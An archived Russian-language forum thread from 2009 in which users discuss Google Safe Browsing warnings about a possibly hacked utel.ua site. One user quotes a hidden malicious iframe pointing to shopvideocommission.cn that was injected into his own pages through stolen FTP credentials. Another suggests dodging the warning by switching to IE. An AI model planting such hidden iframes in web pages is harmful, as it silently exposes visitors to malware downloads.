[ Поиск ]
Полная Версия: utel.ua взломали?
Страницы: 1, 2
alexk
Зашел сегодня к ним на сайт, google выдал предупреждающее сообщение, посмотрел детали:
Цитата

Safe Browsing
Diagnostic page for utel.ua

What is the current listing status for utel.ua?
Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

What happened when Google visited this site?
Of the 4 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-06-24, and the last time suspicious content was found on this site was on 2009-06-24.
Malicious software is hosted on 1 domain(s), including shopvideocommission.cn/.

This site was hosted on 1 network(s) including AS6849 (UKRTELNET).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, utel.ua did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 2 domain(s), including smssender.org.ua/, devahi.net/.

How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:
Return to the previous page.
If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
Newton
это у тебя пишет из под браузера FireFox... зайди из под ИЕ... все будет в порядке... по крайней мере у меня так!!!
BoooM
Цитата(Newton @ 25 Июня, 2009, 14:45)
это у тебя пишет из под браузера FireFox... зайди из под ИЕ... все будет в порядке... по крайней мере у меня так!!!

хороший выход из ситуации
а еще лучше самому скачать вирус и заразить им компьютер smile.gif))
ordruf
походу действительно ломанули
ordruf
Код
Безопасный просмотр
Страница диагностики для utel.ua

Занесен ли сайт utel.ua в список подозрительных веб-сайтов?

   Сайт занесен в список подозрительных веб-сайтов – посещение этого сайта может нанести вред вашему компьютеру.

   В некоторой части этого сайта несколько раз (2) за последние 90 дней была замечена подозрительная активность.

Что произошло во время последнего просмотра этого сайта компанией Google?

   Из протестированных нами за последние 90 дней страниц данного сайта (4) в загрузке и установке вредоносного программного обеспечения без разрешения пользователя было замечено 2. Последний раз сайт просматривался Google 2009-06-24, а подозрительное содержание было обнаружено 2009-06-24.

   Количество доменов, на которых размещается вредоносное ПО, равняется 1, включая shopvideocommission.cn/.

   This site was hosted on 1 network(s) including AS6849 (UKRTELNET).

Был ли данный сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?

   По всей видимости, за последние 90 дней сайт utel.ua не был промежуточным звеном в заражении других сайтов.

Размещается ли на этом сайте вредоносное программное обеспечение?

   Да. За последние 90 дней на этом сайте размещалось вредоносное программное обеспечение. Были заражены некоторые домены (2), включая smssender.org.ua/, devahi.net/.

Как это произошло?

   В некоторых случаях третьи лица могут добавить вредоносный код на вполне законные сайты. Предупреждающее сообщение может быть показано нами именно по этой причине.

Следующие действия:

   * Вернуться на предыдущую страницу.
Newton
Игорь, может ты и прав...
http://www.hidemyass.com/
прекрасно пропускают так же на сайт, почти тоже самое что и ИЕ
alexk
Newton
Цитата

это у тебя пишет из под браузера FireFox... зайди из под ИЕ... все будет в порядке... по крайней мере у меня так!!!


Это у меня пишет из броузера Safari. IE у меня просто нет - не работает он здесь.

Да и какая разница?
Newton
alexk
разница в том что один браузер будет отображать сообщение гугла а другой нет
simpyalex
в опере тоже гугл говорит:
Цитата
Utel
Этот сайт может нанести вред Вашему компьютеру.


это все таки заговор против IE?
Newton
это может из за того что в браузерах кроме ИЕ прописан гугл как поисковая система или что то в этом духе
Advocate
На сайте вирус. Об этом предупреждает Avast.
ordruf
это из за того, что по умолчанию в IE стоит собственная защита от "подозрительных" сайтов, а Firefox юзает Google
BoooM
Я юзаю firefox. Цитата:

Имеется информация, что этот сайт атакует компьютеры!
Имеется информация о том, что сайт utel.ua используется для атак на компьютеры пользователей. В соответствии с вашими настройками безопасности он был заблокирован.
Сайты, атакующие компьютеры, пытаются установить программное обеспечение, которое похищает персональную информацию, вредит вашей системе или использует ваш компьютер для атак на другие компьютеры.
Некоторые сайты намеренно созданы для распространения зловредного программного обеспечения, однако многие сайты были взломаны и делают это без ведома или разрешения своих владельцев.
alexk
Newton
Цитата

это может из за того что в браузерах кроме ИЕ прописан гугл как поисковая система или что то в этом духе


Ну да, а если зажмуриться, то все вирусы в мире исчезнут? Проблема не в броузере и не в гугле скорее всего, с гуглом однажды произошел глюк, связанный с классификацией большинства сайтов как malware, но сразу поднялся сильный шум. Сейчас такого нет.
ratibor
alexk
Opera+Drweb норм, похоже что сафари и файрфокс использовали непроверенную информацию
KOC
Opera+Avast тоже все в порядке
ordruf
я Google больше доверяю, чем Drweb
braz
Цитата(ordruf @ 25 Июня, 2009, 15:22)
Количество доменов, на которых размещается вредоносное ПО, равняется 1, включая shopvideocommission.cn/.


Ого, буквально вчера обнаружил на одном из своих доменов вирусный код в страницых index.php и index.html, там вставлен невидимый iframe, который ведет в том числе и на shopvideocommission.cn:
<iframe src="http://shopvideocommission.cn:8080/index.php" width=182 height=149 style="visibility: hidden"></iframe>

Файлы заражались через ftp, видимо украли логин и пароль.
Avast ругался, говорил что вирус HTML:Iframe-gen

Есть список адресов атакующих хостов, если нужно, могу выложить

Вывод: использовать только sftp, и не хранить пароли в клиентах.

ratibor
ordruf
а я нет, и чё? blush2.gif
GhostDragon
Цитата(ordruf @ 25 Июня, 2009, 20:10)
я Google больше доверяю, чем Drweb

Доверять то ему можно, но были случаи, когда эта хрень ругалась на вполне "честные" сайты.
Fast Reply:

 Enable Smilies |  Enable Signature
Здесь расположена полная версия этой страницы.
Invision Power Board © 2001-2018 Invision Power Services, Inc.